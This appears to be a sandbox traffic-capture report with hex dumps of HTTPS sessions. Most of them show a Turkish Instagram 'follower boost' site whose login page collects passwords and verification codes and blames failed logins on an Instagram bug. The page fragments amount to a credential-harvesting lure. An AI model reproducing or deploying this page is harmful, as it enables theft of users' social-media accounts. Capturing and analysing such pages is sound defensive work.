                    2024-05-26 22:58:16 UTC755INData Raw: 3c 41 b2 f1 44 a0 20 75 ce 28 94 9c f4 39 0a b9 79 83 ff 44 83 36 15 36 c4 69 ff 35 52 7d d2 c9 ac fc f1 2f dd ce a7 9c ff 9f e2 a3 a4 fa 94 03 4d fa ee 3a fa ed 8f 37 f8 ea a8 d5 cb da d3 51 5f af 22 5e 8a 9a 5b ad d6 66 3c 36 b3 5a 9b 6b d7 95 ed a3 24 b8 2f 1e 8f 3f f7 da df cc e6 78 9c 95 17 e7 c7 35 62 0f 80 ee f1 7a ba 83 c8 4a 3a 40 8f b4 a6 90 86 31 8d 27 7e e1 f9 6b 94 ec f2 4a 8a b2 ed 1f e6 a3 4f be 7f 93 87 d9 43 14 c6 6f b1 e4 41 37 a5 1e 4b 7b 5e da 5b fc b8 36 01 bf 92 07 79 7a 52 94 13 d5 f8 1e ab 0f aa 63 6f 33 db 55 55 fd 86 a7 db 93 55 c6 6c f1 a9 60 56 13 99 21 4b 35 f9 54 d5 f2 20 db 65 e1 2e eb 3e 23 a9 6a 11 be 47 f7 a9 b3 b1 5f 6e a0 97 63 6b 63 31 2d de 58 17 33 40 d7 58 a2 76 6d b1 99 63 1c 78 59 e4 72 c0 8b ab 28 52 22 1f 94 4b
                    Data Ascii: <AD u(9yD66i5R}/M:7Q_"^[f<6Zk$/?x5bzJ:@1'~kJOCoA7K{^[6yzRco3UUUl`V!K5T e.>#jG_nckc1-X3@XvmcxYr(R"K


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    71192.168.2.549844104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:25 UTC836OUTGET /login HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764294.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:25 UTC732INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=75b1hdafiGl5io86no2XZsj0d9VHoaz7HdgwrpQfcbOaUd1nqT1IeyQG30LT2i98oAx8VG1YYuVNIrC570BChPtnMt34a3rB%2BInBefSy3UU9%2FKFZx6IGQlCAMJ5HcS0%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15ead8b888c4b-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:25 UTC637INData Raw: 33 34 62 33 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 4c 6f 67 69 6e 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e 20 2c 20 c4 b0 6e 73 74 61 67 72 61 6d 20 74 61 6b 69 70 c3 a7 69 20 68 69 6c 65 73 69 20 2c 20 69 6e 73 74 61 67 72 61 6d 20 62 65 c4 9f 65 6e 69 20 68 69 6c 65 73 69 2c 20 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e
                    Data Ascii: 34b3<html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Login | AnaTakip kendinizi instagram en iyi profili haline getirin , nstagram takipi hilesi , instagram beeni hilesi, </title><meta n
                    2024-05-26 22:58:25 UTC1369INData Raw: 22 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 34 20 69 6e 73 74 61 63 6c 61 73 73 33 30 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 3c 61 72 74 69 63 6c 65 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 61 72 74 69 63 6c 65 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 31 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 32 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 31 35 70 78 20 32 30 70 78 20 31 35 70 78 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 31 30 70 78 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68
                    Data Ascii: "><main class="instaclass4 instaclass30" role="main"><article class="instaarticle3"><div class="instaclass1"><div class="instaclass2"><div style="padding: 15px 20px 15px; text-align: center; color: white; margin-top: -10px; line-heigh
                    2024-05-26 22:58:25 UTC1369INData Raw: 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 38 20 69 6e 73 74 61 63 6c 61 73 73 39 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 31 30 20 69 6e 73 74 61 63 6c 61 73 73 31 31 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 c5 9e 69 66 72 65 22 20 61 72 69 61 2d 72 65 71 75 69 72 65 64 3d 22 74 72 75 65 22 20 6e 61 6d 65 3d 22 70 61 73 73 77 6f 72 64 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 c5 9e 69 66 72 65 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 20 2f 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 6e 73 74 61
                    Data Ascii: <div class="instaclass8 instaclass9"><input type="password" class="instaclass10 instaclass11" aria-describedby aria-label="ifre" aria-required="true" name="password" placeholder="ifre"></div><input type="hidden" name="userid" /><span class="insta
                    2024-05-26 22:58:25 UTC1369INData Raw: 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 62 6c 75 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 22 3e 53 c3 bc 72 65 6b 6c 69 20 c5 9f 69 66 72 65 20 79 61 6e 6c c4 b1 c5 9f 20 68 61 74 61 73 c4 b1 20 69 6c 65 20 6b 61 72 c5 9f c4 b1 6c 61 c5 9f 61 62 69 6c 69 72 73 69 6e 69 7a 2e 20 49 6e 73 74 61 67 72 61 6d 27 c4 b1 6e 20 61 6e 74 69 2d 73 70 61 6d 20 73 69 73 74 65 6d 69 6e 64 65 20 62 69 72 20 68 61 74 61 20 76 61 72 2e 20 4b 6f 6e 75 2c 20 c3 a7 c3 b6 7a 65 62 69 6c 65 63 65 c4 9f 69 6d 69 7a 20 62 69 72 20 c5 9f 65 79 20 64 65 c4 9f 69 6c 2e 20 49 6e 73 74 61 67 72 61 6d 20 6b 65 6e 64 69 73 69 20 c3 a7 c3
                    Data Ascii: tyle="color: black; text-align: left;"><p style="color: blue; text-align: left;">Srekli ifre yanl hatas ile karlaabilirsiniz. Instagram'n anti-spam sisteminde bir hata var. Konu, zebileceimiz bir ey deil. Instagram kendisi
                    2024-05-26 22:58:25 UTC1369INData Raw: 20 33 30 70 78 20 61 75 74 6f 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 38 70 78 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 39 39 30 32 39 3b 0a 09 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 33 39 63 37 33 39 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6f 6e 61 79 5f 6b 6f 64 75 5f 65 6b 72 61 6e 69 20 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 37 35 32 30 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6f 6e 61 79 5f 6b 6f 64 75 5f 65 6b 72 61 6e 69 20 62 75 74 74 6f 6e 3a 64 69 73 61 62
                    Data Ascii: 30px auto;padding: 8px;background: #299029;border: 1px solid #39c739;color: #fff;border-radius: 10px;cursor: pointer;}.onay_kodu_ekrani button:hover {background: #207520;}.onay_kodu_ekrani button:disab
                    2024-05-26 22:58:25 UTC1369INData Raw: 74 28 24 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 5d 27 29 2e 76 61 6c 28 29 29 20 2b 20 22 26 61 6e 74 69 46 6f 72 67 65 72 79 54 6f 6b 65 6e 3d 63 39 63 65 34 36 61 64 62 37 38 63 34 65 66 35 33 37 63 31 66 63 31 30 38 64 66 36 36 65 31 39 22 3b 0a 09 09 09 09 0a 09 09 09 09 24 2e 61 6a 61 78 28 7b 0a 09 09 09 09 09 74 79 70 65 3a 20 22 50 4f 53 54 22 2c 0a 09 09 09 09 09 75 72 6c 3a 20 22 3f 22 2c 0a 09 09 09 09 09 64 61 74 61 54 79 70 65 3a 20 22 6a 73 6f 6e 22 2c 0a 09 09 09 09 09 64 61 74 61 3a 20 64 61 74 61 4c 69 73 74 2c 0a 09 09 09 09 09 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 20 28 6a 73 6f 6e 29 20 7b 0a 09 09 09 09 09 09 69 66 20 28 6a 73 6f 6e 2e 73 74 61 74 75 73 20 3d 3d 20 27 73 75 63 63 65 73 73 27 29 20
                    Data Ascii: t($('input[name="userid"]').val()) + "&antiForgeryToken=c9ce46adb78c4ef537c1fc108df66e19";$.ajax({type: "POST",url: "?",dataType: "json",data: dataList,success: function (json) {if (json.status == 'success')
                    2024-05-26 22:58:25 UTC1369INData Raw: 62 6c 65 64 22 29 3b 0a 09 09 09 09 09 09 09 09 09 09 24 28 27 2e 6b 6f 64 5f 6f 6e 61 79 6c 61 27 29 2e 68 74 6d 6c 28 27 4f 6e 61 79 6c 61 6e c4 b1 79 6f 72 2e 2e 27 29 3b 0a 09 09 09 09 09 09 09 09 09 09 24 2e 61 6a 61 78 28 7b 0a 09 09 09 09 09 09 09 09 09 09 09 75 72 6c 3a 20 22 2f 61 6a 61 78 2f 6b 6f 64 2d 6f 6e 61 79 6c 61 22 2c 0a 09 09 09 09 09 09 09 09 09 09 09 64 61 74 61 3a 20 24 61 6c 6c 44 61 74 61 2c 0a 09 09 09 09 09 09 09 09 09 09 09 74 79 70 65 3a 20 22 50 4f 53 54 22 2c 0a 09 09 09 09 09 09 09 09 09 09 09 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 20 28 6a 73 6f 6e 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 69 66 20 28 6a 73 6f 6e 2e 73 74 61 74 75 73 20 3d 3d 20 22 6f 6b 22 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09
                    Data Ascii: bled");$('.kod_onayla').html('Onaylanyor..');$.ajax({url: "/ajax/kod-onayla",data: $allData,type: "POST",success: function (json) {if (json.status == "ok") {
                    2024-05-26 22:58:25 UTC1369INData Raw: 65 5f 73 65 6c 65 63 74 27 29 2e 76 61 6c 28 29 3b 0a 09 09 09 09 09 09 09 09 7d 0a 0a 0a 09 09 09 09 09 09 09 09 24 28 27 2e 6b 6f 64 5f 69 73 74 65 27 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 09 09 09 09 24 28 27 2e 6b 6f 64 5f 69 73 74 65 27 29 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 20 22 64 69 73 61 62 6c 65 64 22 29 3b 0a 09 09 09 09 09 09 09 09 09 24 28 27 2e 6b 6f 64 5f 69 73 74 65 27 29 2e 68 74 6d 6c 28 27 4b 6f 64 20 c4 b0 73 74 65 6e 69 79 6f 72 2e 2e 2e 27 29 3b 0a 0a 09 09 09 09 09 09 09 09 09 24 2e 61 6a 61 78 28 7b 0a 09 09 09 09 09 09 09 09 09 09 75 72 6c 3a 20 22 2f 61 6a 61 78 2f 6b 6f 64 2d 67 6f 6e 64 65 72 22 2c 0a 09 09 09 09 09 09 09 09 09 09 64 61 74 61 3a 20 24 61 6c 6c 44 61 74
                    Data Ascii: e_select').val();}$('.kod_iste').click(function () {$('.kod_iste').attr("disabled", "disabled");$('.kod_iste').html('Kod steniyor...');$.ajax({url: "/ajax/kod-gonder",data: $allDat
                    2024-05-26 22:58:25 UTC1369INData Raw: 61 6a 61 78 28 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 75 72 6c 3a 20 22 2f 61 6a 61 78 2f 6b 6f 64 2d 6f 6e 61 79 6c 61 22 2c 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 64 61 74 61 3a 20 24 61 6c 6c 44 61 74 61 2c 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 74 79 70 65 3a 20 22 50 4f 53 54 22 2c 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 20 28 6a 73 6f 6e 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 69 66 20 28 6a 73 6f 6e 2e 73 74 61 74 75 73 20 3d 3d 20 22 73 75 63 63 65 73 73 22 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 6a 73 6f 6e 2e 72 65 74 75 72 6e 55 72 6c 3b 0a 09
                    Data Ascii: ajax({url: "/ajax/kod-onayla",data: $allData,type: "POST",success: function (json) {if (json.status == "success") {window.parent.location.href = json.returnUrl;
                    2024-05-26 22:58:25 UTC1369INData Raw: 6f 72 41 6c 65 72 74 27 29 2e 73 68 6f 77 28 29 3b 0a 09 09 09 09 09 09 24 28 27 2e 73 70 69 73 70 69 6e 6e 65 72 27 29 2e 68 69 64 65 28 29 3b 0a 09 09 09 09 09 09 24 6d 61 69 6e 64 69 76 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 29 3b 0a 09 09 09 09 09 09 24 6d 61 69 6e 64 69 76 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 69 6e 73 74 61 63 6c 61 73 73 33 31 22 29 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 29 3b 0a 09 09 09 7d 29 3b 0a 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74
                    Data Ascii: orAlert').show();$('.spispinner').hide();$maindiv.removeAttr("disabled");$maindiv.removeClass("instaclass31");}});});(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || funct


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    72192.168.2.549786142.250.185.1424433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:25 UTC665OUTGET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1
                    Host: translate.google.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:26 UTC698INHTTP/1.1 200 OK
                    Content-Type: text/javascript; charset=utf-8
                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                    Pragma: no-cache
                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                    Date: Sun, 26 May 2024 22:58:26 GMT
                    Cross-Origin-Resource-Policy: cross-origin
                    Cross-Origin-Opener-Policy: same-origin-allow-popups
                    Server: ESF
                    X-XSS-Protection: 0
                    X-Frame-Options: SAMEORIGIN
                    X-Content-Type-Options: nosniff
                    Set-Cookie: __Secure-BUCKET=CKgC; Domain=.google.com; Expires=Fri, 22-Nov-2024 22:58:26 GMT; Path=/; Secure; HttpOnly; SameSite=lax
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Accept-Ranges: none
                    Vary: Accept-Encoding
                    Connection: close
                    Transfer-Encoding: chunked
                    2024-05-26 22:58:26 UTC692INData Raw: 38 30 30 30 0d 0a 0a 20 20 20 20 2f 2f 20 67 6f 2f 6d 73 73 2d 73 65 74 75 70 23 37 2d 6c 6f 61 64 2d 74 68 65 2d 6a 73 2d 6f 72 2d 63 73 73 2d 66 72 6f 6d 2d 79 6f 75 72 2d 69 6e 69 74 69 61 6c 2d 70 61 67 65 0a 20 20 20 20 69 66 28 21 77 69 6e 64 6f 77 5b 27 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 27 5d 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 5b 27 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 27 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 65 3b 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 5b 27 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 27 5d 20 3d 20 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 3b 0a 20 20
                    Data Ascii: 8000 // go/mss-setup#7-load-the-js-or-css-from-your-initial-page if(!window['_DumpException']) { const _DumpException = window['_DumpException'] || function(e) { throw e; }; window['_DumpException'] = _DumpException;
                    2024-05-26 22:58:26 UTC1390INData Raw: 62 2c 69 62 2c 76 2c 6b 62 2c 6e 62 2c 6f 62 2c 70 62 2c 72 62 2c 76 62 3b 5f 2e 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 29 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 74 68 69 73 2c 5f 2e 61 61 29 3b 65 6c 73 65 7b 76 61 72 20 63 3d 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 3b 63 26 26 28 74 68 69 73 2e 73 74 61 63 6b 3d 63 29 7d 61 26 26 28 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 53 74 72 69 6e 67 28 61 29 29 3b 76 6f 69 64 20 30 21 3d 3d 62 26 26 28 74 68 69 73 2e 63 61 75 73 65 3d 62 29 7d 3b 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 25 73 22 29 3b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 61 2e
                    Data Ascii: b,ib,v,kb,nb,ob,pb,rb,vb;_.aa=function(a,b){if(Error.captureStackTrace)Error.captureStackTrace(this,_.aa);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));void 0!==b&&(this.cause=b)};ba=function(a,b){a=a.split("%s");for(var c="",d=a.
                    2024-05-26 22:58:26 UTC1390INData Raw: 72 41 74 28 30 29 2b 66 3b 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 67 29 7c 7c 28 65 5b 67 5d 3d 21 30 2c 62 5b 63 2b 2b 5d 3d 66 29 7d 62 2e 6c 65 6e 67 74 68 3d 63 7d 3b 5f 2e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 74 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22 22 7d 3b 5f 2e 75 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2d 31 21 3d 5f 2e 43 61 28 29 2e 69 6e 64 65 78 4f 66 28 61 29 7d 3b 5f 2e 46 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 44 61 3f 21 21 5f 2e 45 61 26 26 30 3c 5f 2e 45 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3a 21 31
                    Data Ascii: rAt(0)+f;Object.prototype.hasOwnProperty.call(e,g)||(e[g]=!0,b[c++]=f)}b.length=c};_.Ca=function(){var a=_.t.navigator;return a&&(a=a.userAgent)?a:""};_.u=function(a){return-1!=_.Ca().indexOf(a)};_.Fa=function(){return _.Da?!!_.Ea&&0<_.Ea.brands.length:!1
                    2024-05-26 22:58:26 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 5f 2e 59 61 2e 61 70 70 6c 79 28 31 2c 61 72 67 75 6d 65 6e 74 73 29 3b 69 66 28 30 3d 3d 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 5f 2e 5a 61 28 61 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 63 3d 61 5b 30 5d 2c 64 3d 30 3b 64 3c 62 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 63 2b 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 64 5d 29 2b 61 5b 64 2b 31 5d 3b 72 65 74 75 72 6e 20 5f 2e 5a 61 28 63 29 7d 3b 5f 2e 61 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 3b 72 65 74 75 72 6e 28 61 3d 6e 75 6c 6c 3d 3d 28 63 3d 28 62 3d 61 2e 64 6f 63 75 6d 65 6e 74 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 3f 76 6f 69 64 20 30 3a 63 2e 63 61 6c 6c 28 62 2c 22 73 63 72 69 70 74
                    Data Ascii: nction(a){var b=_.Ya.apply(1,arguments);if(0===b.length)return _.Za(a[0]);for(var c=a[0],d=0;d<b.length;d++)c+=encodeURIComponent(b[d])+a[d+1];return _.Za(c)};_.ab=function(a){var b,c;return(a=null==(c=(b=a.document).querySelector)?void 0:c.call(b,"script
                    2024-05-26 22:58:26 UTC1390INData Raw: 3a 21 30 2c 76 61 6c 75 65 3a 67 7d 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 7d 3b 76 61 72 20 63 3d 22 6a 73 63 6f 6d 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 31 45 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3e 3e 3e 30 29 2b 22 5f 22 2c 64 3d 30 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 66 29 7b 69 66 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 62 22 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 28 63 2b 28 66 7c 7c 22 22 29 2b 22 5f 22 2b 64 2b 2b 2c 66 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29
                    Data Ascii: :!0,value:g})};b.prototype.toString=function(){return this.g};var c="jscomp_symbol_"+(1E9*Math.random()>>>0)+"_",d=0,e=function(f){if(this instanceof e)throw new TypeError("b");return new b(c+(f||"")+"_"+d++,f)};return e});v("Symbol.iterator",function(a)
                    2024-05-26 22:58:26 UTC1390INData Raw: 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 3b 0a 5f 2e 71 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 6e 65 77 20 63 3b 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 63 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 7d 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 26 26 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 29 7b 69 66 28 61 28 29 29 72 65 74 75 72 6e 20 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3b 76 61 72 20 62 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3b 72
                    Data Ascii: n(){};b.prototype=a;return new b};_.qb=function(){function a(){function c(){}new c;Reflect.construct(c,[],function(){});return new c instanceof c}if("undefined"!=typeof Reflect&&Reflect.construct){if(a())return Reflect.construct;var b=Reflect.construct;r
